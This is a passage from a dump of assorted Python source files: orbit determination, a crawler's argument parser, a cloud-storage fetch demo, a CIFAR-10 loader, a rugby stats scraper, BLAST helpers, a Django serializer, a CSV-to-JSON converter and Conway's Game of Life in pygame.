\n    r2=np.array((p2*P2)-R2)\n    r3=np.array((p3*P3)-R3)\n    #print(r2_punto_ciclo)\n    r2_punto=(r3-r1)/t[0]\n\n    \"\"\"\n    r1=P1-R1\n    r2=P2-R2\n    r3=P3-R3\n    \"\"\"\n    r=[r1,r2,r3]\n    #print(r2)\n    # find r and r-dot\n    #print(r2_ciclo,r2)\n    if(np.abs(np.linalg.norm(r2_ciclo)-np.linalg.norm(r2))<=0.0001 and np.abs(np.linalg.norm(r2_punto_ciclo)-np.linalg.norm(r2_punto))<=0.0001):\n        if(np.abs(np.linalg.norm(r2_ciclo)-np.linalg.norm(r2))>= -0.0001 and np.abs(np.linalg.norm(r2_punto_ciclo)-np.linalg.norm(r2_punto))>= -0.0001):\n            finale=True\n            print(\"aaa\")\n            #print(r2_ciclo,r2)\n    else:\n        r2_ciclo = r2\n        r2_punto_ciclo = r2_punto\n        finale=False\n        print(\"bbb\")\nrs = r\nr2s_punto = r2_punto\nprint(r2)\nprint(r2_punto)\n#print(rs,r2s_punto)\n\"\"\"\nUp to here\n\"\"\"\n\n\n# rotate the r vectors\ndef Rotar (Ep,vector):\n    return np.dot(np.matrix([[1,0,0],[0,np.cos(Ep),np.sin(Ep)],[0,-np.sin(Ep),np.cos(Ep)]]),vector)\nr=[Rotar(Epsilon,vector) for vector in rs]\nr2n_punto=[Rotar(Epsilon,r2s_punto)]\nr2=r[1]\n \n\"\"\"\nORBITAL ELEMENTS\n\"\"\"\ndef com(x1,x2):\n    comun=[]\n    for x in x1 and x2:\n        comun.append(x)\n    return (comun)\nrm=r2\nrp=r2n_punto\nprint (r2,rp[0], np.shape(rp))\nNorma_rm= np.linalg.norm(rm)\nh=np.cross(rm,rp)\nv2=np.dot(rp,rp)\n# Semi-major axis (a)\n\"\"\"\na=sp.Symbol('a')\na=(2/Norma_rm)-(np.dot(rp,rp)/mu)**-1\n\"\"\"\na=1/((2/rm)-v2)\n#P=2*np.pi*a**(3/2) #~~check where this is used\n\n# Eccentricity (e)\n\n#e=np.sqrt((1-(np.linalg.norm(h)**2))/mu*a)\ne=np.sqrt((1-(np.linalg.norm(h)**2))/a)\n\n# Inclination (i)\n\nhz= h[2]\ni=np.arccos(hz/np.linalg.norm(h)) # between 0 and 90 degrees\n\n# Longitude of the ascending node (O-Omega)\n\nhx=h[0]\nhy=-h[1]\nO1=np.arcsin(hx/np.linalg.norm(h)*np.sin(i))\nO2=np.arccos(-hy/np.linalg.norm(h)*np.sin(i))\nO= com(O1,O2)\n\n# Argument of perihelion (w-omega)\n# find v, the true anomaly\n\nv1=np.arccos(((a*(1-squ(e))/Norma_rm)-1)*1/e)\n#v2=np.arcsin((np.dot(rm,rp)*a*(1-squ(e)))/np.linalg.norm(h)*Norma_rm)\nv2=np.arcsin(((np.dot(rm,rp)*a*(1-squ(e)))/np.linalg.norm(h)*Norma_rm)*1/e)\nv= np.rad2deg(com(v1,v2))\n\n# find U -- check x,y,z\n\nU1=np.arccos(np.dot(rm,np.cos(O)+np.sin(O))/Norma_rm) \nn=[np.cos(O),np.sin(O),0]\nz=Norma_rm*np.cross(n,(rm/Norma_rm)) \nU2=np.arcsin(z[0]/Norma_rm*np.sin(i)*np.sin(O))\nU=np.rad2deg(com(U1,U2))\n\nW=(U-v)\nw=[]\nfor x in W:\n    if (0<=x<360):\n        w.append(x)\n# Mean anomaly (M)\n\nE=np.arccos((1/e)*(1-(Norma_rm/a))) #---check it lands in the same quadrant as v\nM= E-(e*np.sin(E)) \n# There is another way to get M ~check\n \n'''\n ?\n\n# f and g again\nn=np.sqrt(mu/a**3)\ndef fi(r2,DEi): # DEi = delta of the eccentric anomaly (Ei - E of the central observation)\n    return(1-((a/r2)*(1-np.cos(DEi))))\ndef gi(ti,DEi):\n    return((ti-T2)+(1/n)*np.sin(DEi)-DEi)\n'''","sub_path":"orbit det.py","file_name":"orbit det.py","file_ext":"py","file_size_in_byte":10840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"426443378","text":"import argparse\n\nARGS = argparse.ArgumentParser(description=\"Web crawler\")\nARGS.add_argument(\n    '--iocp', action='store_true', dest='iocp',\n    default=False, help='Use IOCP event loop (Windows only)')\nARGS.add_argument(\n    '--select', action='store_true', dest='select',\n    default=False, help='Use Select event loop instead of default')\nARGS.add_argument(\n    'roots', nargs='*',\n    default=[], help='Root URL (may be repeated)')\nARGS.add_argument(\n    '--max_redirect', action='store', type=int, metavar='N',\n    default=10, help='Limit redirection chains (for 301, 302 etc.)')\nARGS.add_argument(\n    '--max_tries', action='store', type=int, metavar='N',\n    default=4, help='Limit retries on network errors')\nARGS.add_argument(\n    '--max_tasks', action='store', type=int, metavar='N',\n    default=100, help='Limit concurrent connections')\nARGS.add_argument(\n    '--exclude', action='store', metavar='REGEX',\n    help='Exclude matching URLs')\nARGS.add_argument(\n    '--strict', action='store_true',\n    default=True, help='Strict host matching (default)')\nARGS.add_argument(\n    '--lenient', action='store_false', dest='strict',\n    default=False, help='Lenient host matching')\nARGS.add_argument(\n    '-v', '--verbose', action='count', dest='level',\n    default=2, help='Verbose logging (repeat for more verbose)')\nARGS.add_argument(\n    '-q', '--quiet', action='store_const', const=0, dest='level',\n    default=2, help='Only log errors')\n\nargs = ARGS.parse_args()\nprint(args)
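\n# Example run (the script just echoes the parsed namespace):\n#   python args.py http://example.com --max_tasks 10 -vv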
","sub_path":"py/basics/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"358762162","text":"# -*- coding=utf-8\nfrom qcloud_cos import CosConfig\nfrom qcloud_cos import CosS3Client\nfrom qcloud_cos import CosServiceError\nfrom qcloud_cos import CosClientError\n\nimport sys\nimport logging\n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\n# Set the user attributes, including secret_id, secret_key and region\n# The appid has been removed from the config; pass it as part of the Bucket parameter instead. Bucket is formed as bucketname-appid\nsecret_id = ''      # replace with your secret_id\nsecret_key = ''     # replace with your secret_key\nregion = 'ap-beijing'  # replace with your region\ntoken = None        # a Token is only required with temporary keys; defaults to None and can be omitted\nscheme = 'http'\nconfig = CosConfig(Region=region, SecretId=secret_id, SecretKey=secret_key, Token=token, Scheme=scheme)  # build the config object\nclient = CosS3Client(config)\n\ntest_bucket = 'examplebucket-1250000000'\n# Start the async fetch task\nresponse = client.put_async_fetch_task(\n    Bucket=test_bucket,\n    FetchTaskConfiguration={\n        'Url': 'http://examplebucket-1250000000.cos.ap-beijing.myqcloud.com/exampleobject',\n        'Key': 'exampleobject'\n    }\n)\n\n# Query the fetch task\nresponse = client.get_async_fetch_task(\n    Bucket=test_bucket,\n    TaskId=response['data']['taskid']\n)\n","sub_path":"demo/fetch_demo.py","file_name":"fetch_demo.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"99322340","text":"import cPickle as pickle\nimport numpy as np\nimport os\nimport urllib\nimport tarfile\nimport zipfile\nimport sys\n\ndef get_cifar_data(dir, option='train'):\n    x = None\n    y_fine = None\n\n    maybe_download_and_extract(dir)\n\n    train_name = ['data_batch_' + str(i+1) for i in range(5)]\n    eval_name = ['test_batch']\n    num_fine_classes = 10\n    fine_label_key = 'labels'\n    coarse_label_key = ''\n\n    folder_name = dir + '/cifar10'\n    if option == \"train\":\n        for f_name in train_name:\n            trainfile = os.path.join(folder_name, f_name)\n            with open(trainfile, 'rb') as f:\n                datadict = pickle.load(f)\n            _x = datadict.get(\"data\")\n            _x = np.array(_x)\n            _x = _x.reshape([-1, 3, 32, 32])\n            _x = _x.transpose([0, 2, 3, 1])\n            _x = _x.reshape(-1, 32, 32, 3)\n\n            _y_fine = np.array(datadict.get(fine_label_key))\n            _y_coarse = np.array(datadict.get(coarse_label_key))\n\n            if x is None:\n                x = _x\n                y_fine = _y_fine\n            else:\n                x = np.concatenate((x,_x), axis=0)\n                y_fine = np.concatenate((y_fine,_y_fine), axis=0)\n\n    elif option == \"test\":\n        for f_name in eval_name:\n            evalfile = os.path.join(folder_name, f_name)\n            with open(evalfile, 'rb') as f:\n                datadict = pickle.load(f)\n            _x = datadict.get(\"data\")\n            _x = np.array(_x)\n            _x = _x.reshape([-1, 3, 32, 32])\n            _x = _x.transpose([0, 2, 3, 1])\n            x = _x.reshape(-1, 32, 32, 3)\n\n            y_fine = np.array(datadict.get(fine_label_key))\n\n    def dense_to_one_hot(labels_dense, num_classes):\n        if num_classes == 0:\n            labels_one_hot = None\n        else:\n            num_labels = labels_dense.shape[0]\n            index_offset = np.arange(num_labels) * num_classes\n            labels_one_hot = np.zeros((num_labels, num_classes))\n            labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n        return labels_one_hot\n
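\n    # For instance, dense_to_one_hot(np.array([0, 2]), 3) yields\n    # [[1, 0, 0], [0, 0, 1]].\n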
\n    return x, dense_to_one_hot(y_fine, num_classes=num_fine_classes)\n\ndef _print_download_progress(count, block_size, total_size):\n    pct_complete = float(count * block_size) / total_size\n    msg = \"\\r- Download progress: {0:.1%}\".format(pct_complete)\n    sys.stdout.write(msg)\n    sys.stdout.flush()\n\ndef maybe_download_and_extract(dir):\n    main_directory = dir + '/'\n\n    if not os.path.exists(main_directory):\n        os.makedirs(main_directory)\n        url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n        filename = url.split('/')[-1]\n        file_path = os.path.join(main_directory, filename)\n        zip_cifar = file_path\n        file_path, _ = urllib.urlretrieve(url=url, filename=file_path, reporthook=_print_download_progress)\n\n        print()\n        print(\"Download finished. Extracting files.\")\n        if file_path.endswith(\".zip\"):\n            zipfile.ZipFile(file=file_path, mode=\"r\").extractall(main_directory)\n        elif file_path.endswith((\".tar.gz\", \".tgz\")):\n            tarfile.open(name=file_path, mode=\"r:gz\").extractall(main_directory)\n        print(\"Done.\")\n        os.rename(main_directory + \"./cifar-10-batches-py\", main_directory + './cifar10')\n        os.remove(zip_cifar)\n\nif __name__ == \"__main__\":\n    pass\n","sub_path":"cifar_input.py","file_name":"cifar_input.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"333507977","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options \nfrom selenium.webdriver.support.select import Select\nimport json\nimport time\nimport args\nimport sys\nimport arrow\nfrom datetime import datetime\n\n\"\"\"\nThis scrapes Leinster Rugby's historical players; it uses the Selenium Python library to drive a web browser, traverse\nthe page and locate the data we want\n\"\"\"\ndef managePlayerListPage():\n    time.sleep(2) #Give page time to load\n    chrome_options = Options() #With Selenium you can set options\n    chrome_options.add_argument(\"--start-maximized\") #The table gets messed up if the window is not maximised\n    #chrome_options.add_argument(\"--headless\") #it's faster when headless\n    driver = webdriver.Chrome(options=chrome_options)\n    url = \"https://www.leinsterrugby.ie/teams/historic-leinster-squads/\"\n    driver.get(url)\n    players = []\n    dropdown = Select(driver.find_element_by_class_name('user-split-by')) #selects dropdown menu\n    temp =dropdown.options\n    result = []\n    for i in range(0, len(temp)): #This iterates through every year\n        dropdown = Select(driver.find_element_by_class_name('user-split-by'))\n        dropdown.select_by_index(i)\n        dropdown = Select(driver.find_element_by_class_name('user-split-by')) #prevents stale element exception\n        result, players = handlePlayerListPage(driver, players, result)\n    toJson(result)\n\ndef handlePlayerListPage(driver, players, all_players):\n    time.sleep(2)\n    temp = driver.find_elements_by_xpath('//a[@href]')\n    text = {}\n    \n    for item in temp:\n        text[item.text] = item.get_attribute(\"href\")\n    for k, v in text.items():
\n        if k not in players and 'historic-players' in v.split('/'): #Keeps a list of players who have already been processed\n            driver.get(v)\n            all_players.append(managePlayerPage(driver, k))\n            players.append(k)\n            driver.back()\n    return all_players, players\n\ndef managePlayerPage(driver, name): #This method manages the iteration over a player page\n    player = {}\n    try: #Some records are empty and do not have a drop down, this deals with this case\n        dropdown = Select(driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-34-content\"]/div/div[1]/select')) \n    except:\n        print(\"Problem with page, skipping \" + name)\n        return player\n    temp =dropdown.options\n    \n    list_of_seasons = []\n    for i in range(0, len(temp)):\n        dropdown = Select(driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-34-content\"]/div/div[1]/select')) \n        season = dropdown.options[i].text\n        if season == '':\n            season = \"2019\"\n        dropdown.select_by_index(i)\n        list_of_seasons.append(handlePlayerPage(driver, season)) #appends each season to a player\n    player_details = get_player_details(driver)\n    player['Season_Totals'] = get_total_season_details(driver)\n    player['Player_Details'] = player_details\n    player['Season_Details'] = list_of_seasons\n    player['Player_Name'] = name\n    print(name)\n    return player\n\ndef get_player_details(driver):\n    \n    \n    player_details = {}\n    header_els = driver.find_elements_by_xpath('//*[@id=\"sotic_wp_widget-32-content\"]')\n    header_list = header_els[0].text.split('\\n')\n    if len(header_list) % 2 ==1:\n        header_list.append('')\n    for i in range(0, int(len(header_list)), 2):\n        player_details[header_list[i]] = header_list[i+1]\n    return player_details\n\ndef get_total_season_details(driver):\n    all_seasons=[]\n    button = driver.find_element_by_xpath('//*[@id=\"competition\"]')\n    button.click()\n    table = driver.find_element_by_xpath('//*[@id=\"sotic_wp_widget-33-content\"]/div/div/table')\n    text = table.text\n    text = text.split('\\n')\n    header = text[0].split(' ')\n    body = text[1:]\n    for item in body:\n        season_details={}\n        components = item.split(' ')\n        if components[1].isnumeric():\n            for i in range(0, len(components)):\n                if i == 0:\n                    season_details['Overall_Total'] = components[i]\n                else:\n                    season_details[header[i]] = components[i]\n        else:\n            components[0:2] = [' '.join(components[0:2])]\n            if components[0][0].isnumeric():\n                for i in range(0, len(components)):\n                    season_details['Season'] = components[0]\n                    if i == 0:\n                        season_details['Season_Total'] = components[i]\n                    else:\n                        season_details[header[i]] = components[i]\n            \n            \n            for i in range(0, len(components)):\n                season_details[header[i]] = components[i]\n        all_seasons.append(season_details)\n    driver.back()\n    return all_seasons\n\ndef handlePlayerPage(driver, season):\n    time.sleep(2)\n    season_details = {}\n    test = driver.find_elements_by_tag_name('tr')\n\n    body = []\n    season_total = []\n\n    \n    for item in test:\n        if item.text != '':\n            if item.text[0:5] != 'Total':\n                body.append(item.text)\n            else:\n                season_total.append(item.text)\n    headers = body[0]\n    body.pop(0)\n    player_details_by_season = {}\n    games = []\n    all_games = []\n    ind_game = {}\n    for item in body: #The table is returned as a 1 line string that is not split. 
I split by space and\n components = item.split(' ') \n if len(item.split(' ')) > 4:\n if item.split(' ')[4].isnumeric() == False:\n components[1:5] = [' '.join(components[1:5])]\n elif item.split(' ')[3].isnumeric() == False:\n if item.split(' ')[3] == '92':\n components[1:5] = [' '.join(components[1:5])]\n else:\n components[1:4] = [' '.join(components[1:4])]\n elif item.split(' ')[2].isnumeric() == False:\n if item.split(' ')[2] == '92':\n components[1:4] = [' '.join(components[1:4])]\n else:\n components[1:3] = [' '.join(components[1:3])]\n games.append(components)\n headers = headers.split()\n for item in games:\n if len(item)> len(headers):\n item.pop(len(item)-1)\n for i in range(0, len(item)):\n ind_game[headers[i]] = item[i]\n all_games.append(ind_game.copy())\n season_details['Games'] = all_games\n season_details['Season'] = season\n return season_details\n\ndef toJson(results):\n with open('Leinster_result1.json', 'w') as fp:\n json.dump(results, fp, ensure_ascii = False)\n\ndef get_highest_date():\n player_date = {}\n with open(\"Leinster_result.json\") as f:\n full_dict = json.loads(f.read())\n for item in full_dict:\n this_season = item['Season_Details']\n name = item['Player_Name']\n try:\n games = this_season[0]['Games']\n except:\n print(\"player played no games\")\n most_recent_date = games[-1]['DATE']\n if len(most_recent_date.split('/')[0]) < 2:\n most_recent_date = \"0\"+most_recent_date \n most_recent_date_time = arrow.get(most_recent_date, 'DD/MM/YYYY')\n player_date[name] = most_recent_date_time\n return full_dict, player_date\n \n\ndef get_update(full_dict, date):\n time.sleep(2) #Give page time to load\n chrome_options = Options() #With Selenium you can set options\n chrome_options.add_argument(\"--start-maximized\") #The table gets messed up if the window is not maximised\n #chrome_options.add_argument(\"--headless\") #its faster when headless \n driver = webdriver.Chrome(options= chrome_options)\n url = \"https://www.leinsterrugby.ie/teams/historic-leinster-squads/\"\n driver.get(url)\n players = []\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #selects dropdown menu\n temp =dropdown.options\n result = []\n dropdown = Select(driver.find_element_by_class_name('user-split-by'))\n dropdown.select_by_index(0)\n dropdown = Select(driver.find_element_by_class_name('user-split-by')) #prevents stale element exception\n temp = driver.find_elements_by_xpath('//a[@href]')\n text = {}\n for item in temp:\n text[item.text] = item.get_attribute(\"href\")\n for k, v in text.items():\n if k not in players and 'historic-players' in v.split('/'): #Keeps a list of players who have already been processed\n driver.get(v)\n count = 0\n for i in range(0, len(full_dict)):\n if k == full_dict[i]['Player_Name']:\n count = i\n break\n \n full_dict[count]['Season_Details'][0] = handlePlayerPage(driver, '2019')\n full_dict[count]['Season_Totals'] = get_total_season_details(driver)\n driver.back()\n result, players = handlePlayerListPage(driver, players, result)\n toJson(result)\n\n\n \nif __name__ == \"__main__\":\n\n global players\n players = {}\n full_dict, date = get_highest_date()\n get_update(full_dict, date)\n managePlayerListPage()\n","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"382383371","text":"\"\"\"functions to write/run/read files using the BLAST+ and a local database.\n\"\"\"\n\nimport os\nimport 
sys\nimport subprocess\nimport numpy\nimport shutil\nfrom Bio.Blast import NCBIXML\n\n_DEBUG_MK = 0\n\n\"\"\"Functions are used within the FilterBlast class to select sequences based on a local blast filtering step.\"\"\"\n\ndef debug(msg):\n \"\"\"short debugging command\n \"\"\"\n if _DEBUG_MK == 1:\n print(msg)\n \n\ndebug(\"Current local_blast version number: 10252018.0\")\n\n\ndef del_blastfiles(workdir):\n \"\"\"Deletes all files in the local blast folder.\n \"\"\"\n try:\n shutil.rmtree(os.path.join(workdir, \"blast\"))\n except: \n sys.stderr.write(\"Blast folder was not removed. Maybe it was not present?\")\n\n\ndef run_filter_blast(workdir, blast_seq, blast_db, output=None):\n \"\"\"Runs a local blast to get measurement of differentiation between available sequences for the same taxon concept.\n\n The blast run will only be run if there are more sequences found than specified by the threshold value.\n When several sequences are found per taxon, blasts each seq against all other ones found for that taxon.\n The measure of differentiation will then be used to select a random representative from the taxon concept,\n but allows to exclude potential mis-identifications.\n In a later step (select_seq_by_local_blast) sequences will be selected based on the blast results generated here.\n\n # Note: has test, runs -> test_run_local_blast.py\n\n :param blast_seq: Name of the file which contains the query seq\n :param blast_db: Name of the file which contains the seq that shall be blasted against - Note, file needs to be in fasta format\n :param output: Optional outpu filename\n \"\"\"\n\n debug(\"run_filter_blast\")\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n out_fn = \"{}_tobeblasted\".format(str(blast_seq))\n cmd1 = \"makeblastdb -in {}_db -dbtype nucl\".format(blast_db)\n os.system(cmd1)\n if output is None:\n cmd2 = \"blastn -query {} -db {}_db -out output_{}.xml -outfmt 5\".format(out_fn, blast_db, out_fn)\n else:\n cmd2 = \"blastn -query {} -db {}_db -out {} -outfmt 5\".format(out_fn, blast_db, output)\n os.system(cmd2)\n os.chdir(general_wd)\n\n\ndef calculate_mean_sd(hsp_scores):\n \"\"\"Calculates standard deviation and mean of scores which are used as a measure of sequence differentiation\n for a given taxon.\n\n This is being used to select a random representative of a taxon later.\n\n Note: has test, runs: test_calculate_mean_sd.py\n\n :param hsp_scores: is a dict generated in read_filter_blast:\n hsp_scores[gi_id] = {'hsp.bits': hsp.bits, 'hsp.score': hsp.score,\n 'alignment.length': alignment.length, 'hsp.expect': hsp.expect}\n \"\"\"\n debug('calculate_mean_sd')\n total_seq = 0\n bit_sum = 0\n bit_l = []\n for gi_id in hsp_scores:\n total_seq += 1\n bit_sum += hsp_scores[gi_id][\"hsp.bits\"]\n bit_l.append(hsp_scores[gi_id][\"hsp.bits\"])\n bit_sd = float(numpy.std(bit_l))\n mean_hsp_bits = float(bit_sum / total_seq)\n mean_sd = {\"mean\": mean_hsp_bits, \"sd\": bit_sd}\n return mean_sd\n\n\ndef read_filter_blast(workdir, seq_d, fn):\n \"\"\"Reads the files of the local blast run and returns sequences below a value\n (within the sd of the mean scores of the hsp.bit scores at the moment).\n\n (this is to make sure seqs chosen are representative of the taxon)\n\n Note: has test, runs: test_read_local_blast.py\n\n \"\"\"\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n output_blast = \"output_{}_tobeblasted.xml\".format(fn)\n xml_file = open(output_blast)\n os.chdir(general_wd)\n blast_out = NCBIXML.parse(xml_file)\n 
hsp_scores = {}\n tries = 5\n for i in range(tries):\n try:\n for record in blast_out:\n for alignment in record.alignments:\n for hsp in alignment.hsps:\n gi_id = alignment.title.split(\" \")[1]\n if gi_id.isdigit():\n gi_id = int(gi_id)\n hsp_scores[gi_id] = {'hsp.bits': hsp.bits, 'hsp.score': hsp.score,\n 'alignment.length': alignment.length, 'hsp.expect': hsp.expect}\n except ValueError:\n debug(\"rebuild the local blast db and try again\")\n sys.stderr.write(\"{} blast file has a problem. Redo running it\".format(fn))\n general_wd = os.getcwd()\n os.chdir(os.path.join(workdir, \"blast\"))\n subprocess.call([\"rm\", \"{}_db.*\".format(fn)])\n cmd1 = \"makeblastdb -in {}_db -dbtype nucl\".format(fn)\n os.system(cmd1)\n cmd2 = \"blastn -query {}_tobeblasted -db {}_db -out output_{}tobeblasted.xml -outfmt 5\".format(fn, fn, fn)\n os.system(cmd2)\n os.chdir(general_wd)\n if i < tries - 1: # i is zero indexed\n continue\n else:\n # debug(\"im going to raise\")\n raise\n break\n # make values to select for blast search, calculate standard deviation,mean\n mean_sd = calculate_mean_sd(hsp_scores)\n # select which sequences to use\n seq_blast_score = {}\n for gi_id in hsp_scores: # use only seq that are similar to mean plus minus sd\n if (hsp_scores[gi_id]['hsp.bits'] >= mean_sd['mean'] - mean_sd['sd']) & \\\n (hsp_scores[gi_id]['hsp.bits'] <= mean_sd['mean'] + mean_sd['sd']):\n if gi_id in seq_d:\n seq_blast_score[gi_id] = seq_d[gi_id]\n return seq_blast_score\n\n\ndef write_filterblast_files(workdir, file_name, seq, db=False, fn=None):\n \"\"\"Writes local blast files which will be read by run_filter_blast.\n \"\"\"\n debug(\"writing files\")\n if not os.path.exists(\"{}/blast\".format(workdir)):\n os.makedirs(\"{}/blast/\".format(workdir))\n if db:\n fnw = \"{}/blast/{}_db\".format(workdir, fn)\n fi_o = open(fnw, \"a\")\n else:\n fnw = \"{}/blast/{}_tobeblasted\".format(workdir, fn)\n fi_o = open(fnw, \"w\")\n fi_o.write(\">{}\\n\".format(file_name))\n fi_o.write(\"{}\\n\".format(str(seq).replace(\"-\", \"\")))\n fi_o.close()\n","sub_path":"physcraper/local_blast.py","file_name":"local_blast.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"59165963","text":"\"\"\"Provides various core tools.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport sys\n\n\nPY3 = sys.version_info[0] == 3\n\"\"\"True if we are running under Python 3.\"\"\"\n\nif PY3:\n range = range\nelse:\n range = xrange\n\nif PY3:\n bytes = bytes\n str = str\nelse:\n bytes = str\n str = unicode\n","sub_path":"pcore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"560184845","text":"# -*- coding:utf-8 -*-\nfrom rest_framework import serializers\n\nfrom ..models import Organization\nfrom ...contacts.models import Contact\n\n\nclass OrganizationSerializer(serializers.ModelSerializer):\n\n contact = serializers.PrimaryKeyRelatedField(\n queryset=Contact.objects.all(),\n write_only=True,\n )\n\n class Meta:\n model = Organization\n fields = ('company', 'title', 'contact',)\n","sub_path":"kratzz/applications/organizations/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243863785","text":"# Dataprocessing\n# Week 3: Interactive Bar Chart with D3\n#\n# 
Tiny Le\n# 11130717\n\nimport csv\nimport json\n\n# Load in CSV\nwith open('knmi.csv', 'r') as csvFile:\n    # Encoding the content in utf-8-sig to remove the BOM at beginning\n    # https://stackoverflow.com/questions/8898294/convert-utf-8-with-bom-to-utf-8-with-no-bom-in-python\n    csvData = csv.reader(csvFile.read().decode('utf-8-sig').encode('utf-8').splitlines())\n\n# Empty arrays to store the CSV and JSON data\njsonData= []\ndata = []\n\n# Go through every line in the CSV file\nfor row in csvData:\n    date = row[0]\n    day = date[6:8]\n    month = date[4:6]\n    year = date[0:4]\n\n    # Format dates to be more readable\n    dateFormatted = day + '-' + month + '-' + year\n    amount = int(row[1])\n\n    # Turn it into json format\n    data = { 'date':dateFormatted, 'amount':str(amount) }\n\n    # Only save the last two weeks of November\n    if int(day) > 16 and int(month) == 11:\n        jsonData.append(data)\n\n# Open JSON file and write the data\nwith open('knmi.json', 'w') as jsonFile:\n    json.dump(jsonData, jsonFile)\n","sub_path":"Homework/week_3/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"168757042","text":"import pygame\nimport random\n# Define some colors and other constants\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (25, 25, 25)\nRED = (255, 0, 0)\nMARGIN = 3\nSQ_LENGTH = 20\nSQ_NUM = 25\nWIN_SIZE = (SQ_NUM + 1) * MARGIN + SQ_NUM * SQ_LENGTH\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (WIN_SIZE, WIN_SIZE)\nscreen = pygame.display.set_mode(size)\n\nautomata = [0] * (SQ_NUM * SQ_NUM)\n\n# Assign random values to our automata: for a given row and col,\n# automata[row * SQ_NUM + col] = set to a random number\n\n# for i in range(SQ_NUM * SQ_NUM):\n#     automata[i] = random.randint(0, 1)\n\nfor row in range(SQ_NUM):\n    for col in range(SQ_NUM):\n        automata[row * SQ_NUM + col] = random.randint(0, 1)\n\n\n# Title\npygame.display.set_caption(\"Conway's Game of Life\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n    # --- Main event loop\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            done = True\n\n    # --- Game logic should go here\n    # Update State (Add Rules to update each cell based on its previous state)\n\n    # Create a new automata for the next state\n    new_automata = [0] * (SQ_NUM * SQ_NUM)\n\n    for i in range(len(automata)):\n        live = 0\n        dead = 8\n\n        # look at neighbors\n        # (8 if conditions)\n        if i - 1 >= 0 and automata[i - 1]:\n            live += 1\n        if i + 1 < (SQ_NUM * SQ_NUM) and automata[i + 1]:\n            live += 1\n        # the remaining neighbours: up, down and the four diagonals\n        if i - SQ_NUM >= 0 and automata[i - SQ_NUM]:\n            live += 1\n        if i + SQ_NUM < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM]:\n            live += 1\n        if i - SQ_NUM - 1 >= 0 and automata[i - SQ_NUM - 1]:\n            live += 1\n        if i + SQ_NUM + 1 < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM + 1]:\n            live += 1\n        if i - SQ_NUM + 1 >= 0 and automata[i - SQ_NUM + 1]:\n            live += 1\n        if i + SQ_NUM - 1 < (SQ_NUM * SQ_NUM) and automata[i + SQ_NUM - 1]:\n            live += 1\n\n        dead -= live\n
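\n        # The branches below implement the classic B3/S23 Life rules:\n        # a live cell with fewer than 2 or more than 3 live neighbours dies,\n        # a live cell with 2 or 3 survives, and a dead cell with exactly 3 becomes alive.\n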
        # Update State\n        # if there are fewer than 2 living neighbors the cell dies\n        if automata[i] and live < 2:\n            new_automata[i] = 0\n        # if alive with fewer than 4 living neighbors the cell carries on living\n        elif automata[i] and live < 4:\n            new_automata[i] = 1\n        # the remaining rules: crowded live cells die, dead cells with exactly 3 neighbors are born\n        elif automata[i] and live >= 4:\n            new_automata[i] = 0\n        elif not automata[i] and live == 3:\n            new_automata[i] = 1\n        else:\n            new_automata[i] = 0\n\n    # swap the data for the next generation's data\n    automata = new_automata\n\n    # --- Screen-clearing code goes here\n    # Here, we clear the screen to gray. Don't put other drawing commands\n    # above this, or they will be erased with this command.\n    screen.fill(GRAY)\n    automata[12] = 1\n    # --- Drawing code should go here\n    # pygame.draw.rect(screen, RED, pygame.Rect(20, 20, 20, 20))\n    y = MARGIN\n    i = 0\n    while y < WIN_SIZE:\n        x = MARGIN\n        while x < WIN_SIZE:\n            if automata[i] == 0:\n                pygame.draw.rect(screen, BLACK, pygame.Rect(\n                    x, y, SQ_LENGTH, SQ_LENGTH))\n            else:\n                pygame.draw.rect(screen, WHITE, pygame.Rect(\n                    x, y, SQ_LENGTH, SQ_LENGTH))\n            i += 1\n            x += SQ_LENGTH + MARGIN\n        y += SQ_LENGTH + MARGIN\n\n    # --- Go ahead and update the screen with what we've drawn.\n    pygame.display.flip()\n\n    # --- Limit to 5 frames per second\n    clock.tick(5)\n# Close the window and quit.\npygame.quit()\n","sub_path":"src/conways.py","file_name":"conways.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 